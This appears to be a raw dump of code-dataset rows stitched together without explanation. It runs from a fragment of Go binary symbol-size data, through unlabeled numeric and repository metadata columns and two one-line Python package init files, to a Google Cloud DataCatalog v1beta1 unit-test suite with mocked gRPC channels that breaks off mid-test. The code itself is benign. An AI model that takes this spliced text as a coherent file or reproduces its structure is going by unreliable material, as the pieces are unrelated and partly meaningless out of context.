'statictmp_372': {'value': 56}, 'statictmp_373': {'value': 6}, 'statictmp_374': {'value': 56}, 'statictmp_376': {'value': 24}, 'statictmp_377': {'value': 56}, 'statictmp_379': {'value': 36}, 'statictmp_38': {'value': 48}, 'statictmp_380': {'value': 56}, 'statictmp_381': {'value': 12}, 'statictmp_382': {'value': 56}, 'statictmp_383': {'value': 12}, 'statictmp_384': {'value': 56}, 'statictmp_385': {'value': 12}, 'statictmp_386': {'value': 56}, 'statictmp_387': {'value': 12}, 'statictmp_388': {'value': 56}, 'statictmp_39': {'value': 56}, 'statictmp_390': {'value': 24}, 'statictmp_391': {'value': 56}, 'statictmp_393': {'value': 12}, 'statictmp_394': {'value': 56}, 'statictmp_396': {'value': 24}, 'statictmp_397': {'value': 56}, 'statictmp_399': {'value': 36}, 'statictmp_4': {'value': 56}, 'statictmp_40': {'value': 1692}, 'statictmp_400': {'value': 56}, 'statictmp_401': {'value': 72}, 'statictmp_402': {'value': 12}, 'statictmp_403': {'value': 56}, 'statictmp_405': {'value': 24}, 'statictmp_406': {'value': 56}, 'statictmp_408': {'value': 36}, 'statictmp_409': {'value': 56}, 'statictmp_41': {'value': 1800}, 'statictmp_410': {'value': 12}, 'statictmp_411': {'value': 56}, 'statictmp_412': {'value': 6}, 'statictmp_413': {'value': 56}, 'statictmp_414': {'value': 24}, 'statictmp_415': {'value': 56}, 'statictmp_416': {'value': 12}, 'statictmp_417': {'value': 56}, 'statictmp_418': {'value': 18}, 'statictmp_419': {'value': 56}, 'statictmp_42': {'value': 56}, 'statictmp_420': {'value': 12}, 'statictmp_421': {'value': 56}, 'statictmp_422': {'value': 30}, 'statictmp_423': {'value': 56}, 'statictmp_424': {'value': 12}, 'statictmp_425': {'value': 56}, 'statictmp_427': {'value': 24}, 'statictmp_428': {'value': 56}, 'statictmp_429': {'value': 96}, 'statictmp_43': {'value': 42}, 'statictmp_430': {'value': 56}, 'statictmp_432': {'value': 36}, 'statictmp_433': {'value': 56}, 'statictmp_434': {'value': 78}, 'statictmp_435': {'value': 56}, 'statictmp_436': {'value': 6}, 'statictmp_437': {'value': 56}, 'statictmp_438': {'value': 12}, 'statictmp_439': {'value': 56}, 'statictmp_44': {'value': 56}, 'statictmp_440': {'value': 42}, 'statictmp_441': {'value': 56}, 'statictmp_442': {'value': 18}, 'statictmp_443': {'value': 56}, 'statictmp_445': {'value': 24}, 'statictmp_446': {'value': 56}, 'statictmp_448': {'value': 24}, 'statictmp_449': {'value': 56}, 'statictmp_45': {'value': 618}, 'statictmp_450': {'value': 6}, 'statictmp_451': {'value': 56}, 'statictmp_453': {'value': 24}, 'statictmp_454': {'value': 56}, 'statictmp_455': {'value': 12}, 'statictmp_456': {'value': 56}, 'statictmp_458': {'value': 12}, 'statictmp_459': {'value': 56}, 'statictmp_46': {'value': 420}, 'statictmp_460': {'value': 18}, 'statictmp_461': {'value': 56}, 'statictmp_462': {'value': 24}, 'statictmp_463': {'value': 56}, 'statictmp_464': {'value': 126}, 'statictmp_465': {'value': 56}, 'statictmp_466': {'value': 42}, 'statictmp_467': {'value': 12}, 'statictmp_468': {'value': 56}, 'statictmp_469': {'value': 738}, 'statictmp_47': {'value': 56}, 'statictmp_470': {'value': 432}, 'statictmp_471': {'value': 56}, 'statictmp_472': {'value': 138}, 'statictmp_473': {'value': 72}, 'statictmp_474': {'value': 56}, 'statictmp_475': {'value': 36}, 'statictmp_476': {'value': 56}, 'statictmp_477': {'value': 60}, 'statictmp_478': {'value': 56}, 'statictmp_479': {'value': 12}, 'statictmp_48': {'value': 582}, 'statictmp_480': {'value': 56}, 'statictmp_481': {'value': 6}, 'statictmp_482': {'value': 56}, 'statictmp_483': {'value': 42}, 'statictmp_484': {'value': 108}, 'statictmp_485': {'value': 56}, 'statictmp_486': {'value': 6}, 'statictmp_487': {'value': 56}, 'statictmp_488': {'value': 42}, 'statictmp_489': {'value': 56}, 'statictmp_49': {'value': 516}, 'statictmp_490': {'value': 12}, 'statictmp_491': {'value': 192}, 'statictmp_492': {'value': 56}, 'statictmp_493': {'value': 882}, 'statictmp_494': {'value': 708}, 'statictmp_495': {'value': 56}, 'statictmp_496': {'value': 42}, 'statictmp_497': {'value': 48}, 'statictmp_498': {'value': 56}, 'statictmp_499': {'value': 90}, 'statictmp_5': {'value': 1068}, 'statictmp_50': {'value': 56}, 'statictmp_500': {'value': 96}, 'statictmp_501': {'value': 56}, 'statictmp_502': {'value': 24}, 'statictmp_503': {'value': 56}, 'statictmp_504': {'value': 24}, 'statictmp_505': {'value': 56}, 'statictmp_506': {'value': 120}, 'statictmp_507': {'value': 56}, 'statictmp_508': {'value': 420}, 'statictmp_509': {'value': 768}, 'statictmp_51': {'value': 30}, 'statictmp_510': {'value': 56}, 'statictmp_511': {'value': 12}, 'statictmp_512': {'value': 36}, 'statictmp_513': {'value': 56}, 'statictmp_514': {'value': 168}, 'statictmp_515': {'value': 56}, 'statictmp_516': {'value': 30}, 'statictmp_517': {'value': 56}, 'statictmp_518': {'value': 24}, 'statictmp_519': {'value': 12}, 'statictmp_52': {'value': 56}, 'statictmp_520': {'value': 56}, 'statictmp_521': {'value': 78}, 'statictmp_522': {'value': 56}, 'statictmp_523': {'value': 18}, 'statictmp_524': {'value': 56}, 'statictmp_526': {'value': 12}, 'statictmp_527': {'value': 56}, 'statictmp_528': {'value': 264}, 'statictmp_529': {'value': 288}, 'statictmp_53': {'value': 1056}, 'statictmp_530': {'value': 56}, 'statictmp_531': {'value': 108}, 'statictmp_532': {'value': 156}, 'statictmp_533': {'value': 56}, 'statictmp_534': {'value': 378}, 'statictmp_535': {'value': 408}, 'statictmp_536': {'value': 56}, 'statictmp_537': {'value': 54}, 'statictmp_538': {'value': 60}, 'statictmp_539': {'value': 56}, 'statictmp_54': {'value': 1092}, 'statictmp_540': {'value': 12}, 'statictmp_541': {'value': 12}, 'statictmp_542': {'value': 56}, 'statictmp_543': {'value': 60}, 'statictmp_546': {'value': 56}, 'statictmp_547': {'value': 6}, 'statictmp_548': {'value': 56}, 'statictmp_549': {'value': 612}, 'statictmp_55': {'value': 56}, 'statictmp_550': {'value': 60}, 'statictmp_551': {'value': 56}, 'statictmp_552': {'value': 54}, 'statictmp_553': {'value': 56}, 'statictmp_554': {'value': 612}, 'statictmp_555': {'value': 60}, 'statictmp_556': {'value': 56}, 'statictmp_557': {'value': 12}, 'statictmp_558': {'value': 56}, 'statictmp_559': {'value': 12}, 'statictmp_56': {'value': 222}, 'statictmp_560': {'value': 56}, 'statictmp_561': {'value': 6}, 'statictmp_562': {'value': 56}, 'statictmp_563': {'value': 6}, 'statictmp_564': {'value': 56}, 'statictmp_565': {'value': 12}, 'statictmp_57': {'value': 216}, 'statictmp_58': {'value': 56}, 'statictmp_59': {'value': 42}, 'statictmp_6': {'value': 924}, 'statictmp_60': {'value': 48}, 'statictmp_61': {'value': 56}, 'statictmp_62': {'value': 168}, 'statictmp_63': {'value': 372}, 'statictmp_64': {'value': 56}, 'statictmp_65': {'value': 30}, 'statictmp_66': {'value': 56}, 'statictmp_67': {'value': 66}, 'statictmp_68': {'value': 56}, 'statictmp_69': {'value': 132}, 'statictmp_7': {'value': 56}, 'statictmp_70': {'value': 56}, 'statictmp_71': {'value': 30}, 'statictmp_72': {'value': 56}, 'statictmp_73': {'value': 36}, 'statictmp_74': {'value': 56}, 'statictmp_75': {'value': 654}, 'statictmp_76': {'value': 468}, 'statictmp_77': {'value': 56}, 'statictmp_78': {'value': 150}, 'statictmp_79': {'value': 56}, 'statictmp_8': {'value': 396}, 'statictmp_80': {'value': 72}, 'statictmp_81': {'value': 56}, 'statictmp_82': {'value': 138}, 'statictmp_83': {'value': 24}, 'statictmp_84': {'value': 56}, 'statictmp_85': {'value': 258}, 'statictmp_86': {'value': 72}, 'statictmp_87': {'value': 56}, 'statictmp_88': {'value': 600}, 'statictmp_89': {'value': 696}, 'statictmp_9': {'value': 576}, 'statictmp_90': {'value': 56}, 'statictmp_91': {'value': 36}, 'statictmp_92': {'value': 56}, 'statictmp_93': {'value': 6}, 'statictmp_94': {'value': 56}, 'statictmp_95': {'value': 6}, 'statictmp_96': {'value': 56}, 'statictmp_98': {'value': 36}, 'statictmp_99': {'value': 56}}}, 'unicode/': {'children': {'utf8.': {'children': {'DecodeRuneInString': {'value': 532}, 'EncodeRune': {'value': 337}, 'RuneCount': {'value': 316}, 'RuneCountInString': {'value': 316}, 'acceptRanges': {'value': 10}, 'first': {'value': 256}}}}}, 'TYPEDATA': {'value': 23532}}}, 'c/c++ · ': {'children': {'_cgo_callers': {'value': 8}, '_cgo_init': {'value': 8}, '_cgo_mmap': {'value': 8}, '_cgo_munmap': {'value': 8}, '_cgo_notify_runtime_init_done': {'value': 8}, '_cgo_sigaction': {'value': 8}, '_cgo_thread_start': {'value': 8}, '_cgo_yield': {'value': 8}, '_rt0_amd64': {'value': 14}, '_rt0_amd64_linux': {'value': 5}, 'callRet': {'value': 48}, 'cmpbody': {'value': 569}, 'debugCall1024': {'value': 112}, 'debugCall128': {'value': 109}, 'debugCall16384': {'value': 130}, 'debugCall2048': {'value': 112}, 'debugCall256': {'value': 112}, 'debugCall32': {'value': 73}, 'debugCall32768': {'value': 130}, 'debugCall4096': {'value': 130}, 'debugCall512': {'value': 112}, 'debugCall64': {'value': 73}, 'debugCall65536': {'value': 130}, 'debugCall8192': {'value': 130}, 'debugCallFrameTooLarge': {'value': 20}, 'gosave': {'value': 53}, 'indexbytebody': {'value': 279}, 'masks': {'value': 256}, 'memeqbody': {'value': 318}, 'setg_': {'children': {'gcc': {'value': 10}}}, 'shifts': {'value': 256}, 'VTABLES': {'value': 0}, 'TYPEDATA': {'value': 0}, 'INITIALIZERS': {'value': 0}}}, 'UNKNOWN': {'value': 0}}}
| 45,183
| 90,365
| 0.586592
| 9,886
| 90,366
| 5.272709
| 0.253996
| 0.039366
| 0.067222
| 0.018705
| 0.140237
| 0.116122
| 0.112362
| 0.107259
| 0.104593
| 0.100717
| 0
| 0.110336
| 0.099551
| 90,366
| 1
| 90,366
| 90,366
| 0.530245
| 0
| 0
| 0
| 0
| 0
| 0.520771
| 0.011985
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
|
0
| 7
|
36f4ef5a4de62e0071b758ef7a05d23ccfc92e5e
| 102
|
py
|
Python
|
ivy_builder/data_loaders/__init__.py
|
ivy-dl/builder
|
a24d7254e90476332b962f9aba9a02222c55e035
|
[
"Apache-2.0"
] | 1
|
2022-02-20T15:40:01.000Z
|
2022-02-20T15:40:01.000Z
|
ivy_builder/data_loaders/__init__.py
|
ivy-dl/builder
|
a24d7254e90476332b962f9aba9a02222c55e035
|
[
"Apache-2.0"
] | null | null | null |
ivy_builder/data_loaders/__init__.py
|
ivy-dl/builder
|
a24d7254e90476332b962f9aba9a02222c55e035
|
[
"Apache-2.0"
] | 1
|
2022-03-29T15:21:56.000Z
|
2022-03-29T15:21:56.000Z
|
from . import specs
from .specs import *
from . import seq_data_loader
from .seq_data_loader import *
| 20.4
| 30
| 0.784314
| 16
| 102
| 4.75
| 0.375
| 0.263158
| 0.342105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 102
| 4
| 31
| 25.5
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7fda9f3992f650c281f2088e7c435c17e7327ae9
| 45
|
py
|
Python
|
oapi/oas/__init__.py
|
davebelais/oapi
|
5d4f6f21529d491496e1991e0d30209ef5e90c49
|
[
"MIT"
] | null | null | null |
oapi/oas/__init__.py
|
davebelais/oapi
|
5d4f6f21529d491496e1991e0d30209ef5e90c49
|
[
"MIT"
] | null | null | null |
oapi/oas/__init__.py
|
davebelais/oapi
|
5d4f6f21529d491496e1991e0d30209ef5e90c49
|
[
"MIT"
] | 1
|
2020-08-27T16:08:56.000Z
|
2020-08-27T16:08:56.000Z
|
from . import model
from . import references
| 15
| 24
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 25
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d2bfe59cca788477502a48de0ce5c4243b5f031
| 42,254
|
py
|
Python
|
datacatalog/tests/unit/gapic/v1beta1/test_data_catalog_client_v1beta1.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | null | null | null |
datacatalog/tests/unit/gapic/v1beta1/test_data_catalog_client_v1beta1.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | null | null | null |
datacatalog/tests/unit/gapic/v1beta1/test_data_catalog_client_v1beta1.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.cloud import datacatalog_v1beta1
from google.cloud.datacatalog_v1beta1.proto import datacatalog_pb2
from google.cloud.datacatalog_v1beta1.proto import search_pb2
from google.cloud.datacatalog_v1beta1.proto import tags_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self, method, request_serializer=None, response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestDataCatalogClient(object):
def test_search_catalog(self):
# Setup Expected Response
next_page_token = ""
results_element = {}
results = [results_element]
expected_response = {"next_page_token": next_page_token, "results": results}
expected_response = datacatalog_pb2.SearchCatalogResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
scope = {}
query = "query107944136"
paged_list_response = client.search_catalog(scope, query)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.results[0] == resources[0]
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.SearchCatalogRequest(
scope=scope, query=query
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_search_catalog_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
scope = {}
query = "query107944136"
paged_list_response = client.search_catalog(scope, query)
with pytest.raises(CustomException):
list(paged_list_response)
def test_create_entry_group(self):
# Setup Expected Response
name = "name3373707"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.EntryGroup(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.location_path("[PROJECT]", "[LOCATION]")
entry_group_id = "entryGroupId-43122680"
entry_group = {}
response = client.create_entry_group(parent, entry_group_id, entry_group)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.CreateEntryGroupRequest(
parent=parent, entry_group_id=entry_group_id, entry_group=entry_group
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_entry_group_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.location_path("[PROJECT]", "[LOCATION]")
entry_group_id = "entryGroupId-43122680"
entry_group = {}
with pytest.raises(CustomException):
client.create_entry_group(parent, entry_group_id, entry_group)
def test_get_entry_group(self):
# Setup Expected Response
name_2 = "name2-1052831874"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name_2,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.EntryGroup(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
response = client.get_entry_group(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.GetEntryGroupRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_entry_group_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
with pytest.raises(CustomException):
client.get_entry_group(name)
def test_delete_entry_group(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
client.delete_entry_group(name)
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.DeleteEntryGroupRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_entry_group_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
with pytest.raises(CustomException):
client.delete_entry_group(name)
def test_create_entry(self):
# Setup Expected Response
name = "name3373707"
linked_resource = "linkedResource1544625012"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name,
"linked_resource": linked_resource,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.Entry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
entry_id = "entryId-2093663224"
entry = {}
response = client.create_entry(parent, entry_id, entry)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.CreateEntryRequest(
parent=parent, entry_id=entry_id, entry=entry
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_entry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
entry_id = "entryId-2093663224"
entry = {}
with pytest.raises(CustomException):
client.create_entry(parent, entry_id, entry)
def test_update_entry(self):
# Setup Expected Response
name = "name3373707"
linked_resource = "linkedResource1544625012"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name,
"linked_resource": linked_resource,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.Entry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
entry = {}
response = client.update_entry(entry)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.UpdateEntryRequest(entry=entry)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_entry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
entry = {}
with pytest.raises(CustomException):
client.update_entry(entry)
def test_delete_entry(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
client.delete_entry(name)
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.DeleteEntryRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_entry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
with pytest.raises(CustomException):
client.delete_entry(name)
def test_get_entry(self):
# Setup Expected Response
name_2 = "name2-1052831874"
linked_resource = "linkedResource1544625012"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name_2,
"linked_resource": linked_resource,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.Entry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
response = client.get_entry(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.GetEntryRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_entry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
with pytest.raises(CustomException):
client.get_entry(name)
def test_lookup_entry(self):
# Setup Expected Response
name = "name3373707"
linked_resource = "linkedResource1544625012"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name,
"linked_resource": linked_resource,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.Entry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
response = client.lookup_entry()
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.LookupEntryRequest()
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_lookup_entry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
with pytest.raises(CustomException):
client.lookup_entry()
def test_create_tag_template(self):
# Setup Expected Response
name = "name3373707"
display_name = "displayName1615086568"
expected_response = {"name": name, "display_name": display_name}
expected_response = tags_pb2.TagTemplate(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.location_path("[PROJECT]", "[LOCATION]")
tag_template_id = "tagTemplateId-2020335141"
tag_template = {}
response = client.create_tag_template(parent, tag_template_id, tag_template)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.CreateTagTemplateRequest(
parent=parent, tag_template_id=tag_template_id, tag_template=tag_template
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_tag_template_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.location_path("[PROJECT]", "[LOCATION]")
tag_template_id = "tagTemplateId-2020335141"
tag_template = {}
with pytest.raises(CustomException):
client.create_tag_template(parent, tag_template_id, tag_template)
def test_get_tag_template(self):
# Setup Expected Response
name_2 = "name2-1052831874"
display_name = "displayName1615086568"
expected_response = {"name": name_2, "display_name": display_name}
expected_response = tags_pb2.TagTemplate(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
response = client.get_tag_template(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.GetTagTemplateRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_tag_template_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
with pytest.raises(CustomException):
client.get_tag_template(name)
def test_update_tag_template(self):
# Setup Expected Response
name = "name3373707"
display_name = "displayName1615086568"
expected_response = {"name": name, "display_name": display_name}
expected_response = tags_pb2.TagTemplate(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
tag_template = {}
response = client.update_tag_template(tag_template)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.UpdateTagTemplateRequest(
tag_template=tag_template
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_tag_template_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
tag_template = {}
with pytest.raises(CustomException):
client.update_tag_template(tag_template)
def test_delete_tag_template(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
force = False
client.delete_tag_template(name, force)
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.DeleteTagTemplateRequest(
name=name, force=force
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_tag_template_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
force = False
with pytest.raises(CustomException):
client.delete_tag_template(name, force)
def test_create_tag_template_field(self):
# Setup Expected Response
name = "name3373707"
display_name = "displayName1615086568"
is_required = True
expected_response = {
"name": name,
"display_name": display_name,
"is_required": is_required,
}
